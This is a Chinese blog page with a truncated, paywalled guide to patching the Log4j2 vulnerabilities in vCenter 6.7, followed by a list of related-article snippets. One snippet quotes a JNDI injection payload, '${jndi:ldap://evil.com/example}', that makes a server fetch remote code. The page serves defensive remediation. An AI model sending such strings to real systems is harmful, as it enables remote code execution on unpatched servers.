vCenter修复Apache log4j2漏洞(CVE-2021-44228, CVE-2021-45046)

最新推荐文章于 2025-04-17 10:40:29 发布
最新推荐文章于 2025-04-17 10:40:29 发布
阅读量4.7k 收藏
点赞数
分类专栏: vsphere6.7 文章标签: 安全 运维 log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_27248929/article/details/122044216
版权

2021年12月Apache log4j2远程执行漏洞影响到的VMware产品列表:VMSA-2021-0028.4 (vmware.com)

本次我们所涉及到的产品及版本是vSphere6.7下的vCenter Server Application6.7.x,以下是加固的配置步骤:

1)首先打开vCenter的shell连接,需从控制台进入vCenter虚机进行配置操作,具体为进入排错模式,Enable shell和SSH选项;

 2)打开xshell 通过SSH连接vCenter进行命令行操作,根据提示可见需运行“shell”命令,进入shell操作;

3)然后依次在命令行中执行如下操作,即可:

 vMON Service

最低0.47元/天 解锁文章
Log4j CVE-2021-44228后续-CVE-2021-45046CVE-2021-45105
oscar999的专栏
12-20 1342
Log4j 发现远程代码攻击漏洞CVE-2021-44228 )之后, Apache 随即发布了 2.15.0版本, 但是发布的这个版本在线程上下文查找依旧存在远程代码攻击漏洞CVE-2021-45046),于是随后又发布了 2.16.0版本; 不幸的是,两天后,Log4j 又被发现了DOS(拒绝服务)的漏洞CVE-2021-45105), 于是又发布了2.17.0 版本, 截止目前位置, Log4j 在Java 8的**安全版本是2.17.0 **。
Windows 版 vCenter Server 中的 log4j 处理
ixpqq的博客
12-20 1250
CVE-2021-44228 参考官方文档 https://kb.vmware.com/s/article/87096 remove_log4j_class.pyhttps://kb.vmware.com/sfc/servlet.shepherd/version/download/0685G00000d7LsEQAU vMON.pyhttps://kb.vmware.com/sfc/servlet.shepherd/version/download/0685G00000cPSJyQAO 备份目...
漏洞修复Apache Log4j 远程代码执行漏洞(CVE-2021-44228CVE-2021-45046)
m0_52985087的博客
01-23 1554
本文档适用于OpenEuler20、OpenEuler21、OpenEuler22、麒麟V10 SP3、统信V10操作系统,修复Log4漏洞
VMware 多个产品LOG4J2远程代码执行漏洞-(CVE-2021-44228/CVE-2021-45046)
tamchikit的博客
01-04 1519
VMware 多个产品LOG4J2远程代码执行漏洞-(CVE-2021-44228/CVE-2021-45046)
CVE-2021-44228,原理上是 log4j-core 代码中的 JNDI 注入漏洞。这个漏洞可以直接导致服务器被入侵,而且由于“日志”场景的特性,攻击数
最新发布
weizhennan123的博客
04-17 293
CVE-2021-44228,原理上是 log4j-core 代码中的 JNDI 注入漏洞。这个漏洞可以直接导致服务器被入侵,而且由于“日志”场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器。log4j 作为 Java 开发的基础公共日志类,使用范围非常广,漏洞必定影响深远,想想当年commons-collections反序列化漏洞的影响范围。Github漏洞公告:https://github.com/advisories/GHSA-jfh8-c2jp-5v3q影响 < 2.15.0 的所有
VMware 修复 vCenter 服务器中的严重 RCE 漏洞
smellycat000的专栏
02-24 894
聚焦源代码安全,网罗国内外最新资讯!作者:Pierluigi Paganini编译:奇安信代码卫士团队VMware 修复 vCenter Server 虚拟基础设施管理平台中的一个严重远...
Apache Log4j 远程代码执行漏洞(CVE-2021-44228CVE-2021-45046)
小小关的博客
05-19 986
1.Java 6 将 log4j 升级到 2.3.1 版本,Java 7 将 log4j 升级到 2.12.3 版本,Java 8 或更高版本将 log4j 升级到 2.17.0 版本,下载地址:https://logging.apache.org/log4j/2.x/download.html 2.若暂时无法升级,删除jar包中漏洞相关的JndiLookup.class文件: zip -q -d log4j-core-xxx.jar org/apache/logging/log4j/core/looku.
VMware vCenter Server 堆溢出(CVE-2024-38812)漏洞修复及下载
nick_zlg的专栏
10-23 1004
1. 下载补丁镜像 ( VMware-vCenter-Server-Appliance-8.0.2.00500-24321653-patch-FP.iso )3. 登录 vCenter Server Appliance 的管理页面,默认是https://IP:5480。2. 登录到 vCenter的web管理页面,挂载ISO文件至VCSA虚拟机中。链接:https://pan.quark.cn/s/92af89874203。1、点击更新--检查CD-ROM;下载链接及提取码,转载请说明出处。
測試 VMware vCenter 的 Log4Shell 漏洞 - HackMD1
08-04
Log4Shell漏洞,全称为CVE-2021-44228,是Apache Log4j2库中的一个严重远程代码执行漏洞。这个漏洞允许攻击者通过输入特定的日志格式字符串,触发Java Naming and Directory Interface (JNDI) 查找,进而执行任意...
cve-2021-45428
07-28
- *1* *2* *3* [vCenter修复Apache log4j2漏洞CVE-2021-44228, CVE-2021-45046)](https://blog.youkuaiyun.com/qq_27248929/article/details/122044216)[target="_blank" data-report-click={"spm":"1018.2226.3001....
VMware VCenter 6.5.x/6.7.x log4j漏洞临时措施 (CVE-2021-44228)
shoulham的博客
12-15 1203
VCENTER进行log4j漏洞临时措施,建议参考下面VMware的kb进行操作和验证。 https://kb.vmware.com/s/article/87081?lang=en_US 这里对其中一个步骤做下说明,无论是哪个版本的,都需要修改vMON服务,按照kb指引,是如下步骤 vMON Service 1、备份java-wrapper-vmon文件 cp -rfp /usr/lib/vmware-vmon/java-wrapper-vmon /usr/lib/vmware-vmon/java-wr
vCenter(VCSA)log4j漏洞发现与修复
nick_zlg的专栏
12-29 3210
VMware官方关于log4j的参考链接: VMSA-2021-0028.8https://www.vmware.com/security/advisories/VMSA-2021-0028.html log4j漏洞出现后,VMware官方确认VCSA(7.x、6.7.x、6.5.x)、Windows版vCenter(6.7.x、6.5.x)均可被利用,截至2021年1229日均未发布最新的Patch进行修复。 VCSA 的6.5.x、7.X 默认使用的是CSHELL,如通过SFTP工具上传和下载文
漏洞复现笔记(CVE-2021-44228
weixin_72760965的博客
06-14 1098
apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广。影响版本受影响组件:环境搭建使用vulhub搭建靶场需要docker环境访问系统。
Apache Log4j 2 漏洞修复指南(CVE-2021-44228
Wraith的博客
12-10 9691
Apache Log4j 2 漏洞修复指南 CVE-2021-44228 Log4j 团队已注意到一个安全漏洞 CVE-2021-44228,该漏洞已在 Log4j 2.15.0 中得到解决。 Log4j 的 JNDI 支持没有限制可以解析的名称。某些协议不安全或允许远程代码执行。Log4j 现在默认将协议限制为仅 java、ldap 和 ldaps,并将 ldap 协议限制为默认仅访问本地主机上提供的 Java 原始对象。 允许暴露此漏洞的一个向量是 Log4j 允许查找出现在日志消息中。从 Log4j
CVE-2021-44228漏洞复现
m0_65764670的博客
05-29 2992
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
Vector关于Apache Log4Shell CVE-2021-45105,CVE-2021-45046CVE-2021-44228安全漏洞配合与修复全面详解
Polelink北汇信息的博客
12-30 3396
Apache Log4j2 是一个基于 Java 的日志记录开源组件。近日,Log4j2 被爆出现安全漏洞,攻击者可以通过向易受攻击的服务器或应用程序发送操纵请求来利用安全漏洞。Vector 德国PREEvison产品团队已经通过官网和客户管理系统及时通知客户,有关PREEvision中使用的软件组件的严重安全漏洞“Log4Shell”CVE-2021-44228,说明如下:
Log4j漏洞修复----VMware Vcenter Server
weixin_57323573的博客
09-09 408
VMware Vcenter Server----Log4j漏洞修复----bash shell启用
Apache Log4j2 RCE漏洞复现(CVE-2021-44228)
SuperherRo的博客
10-31 810
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过 该漏洞构造特殊的数据请求包,最终触发远程代码执行。
【实战】log4j2远程命令执行漏洞利用姿势汇总
mingyqf的博客
09-24 1351
原文链接:https://www.cnblogs.com/peterpan0707007/p/15772359.html。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值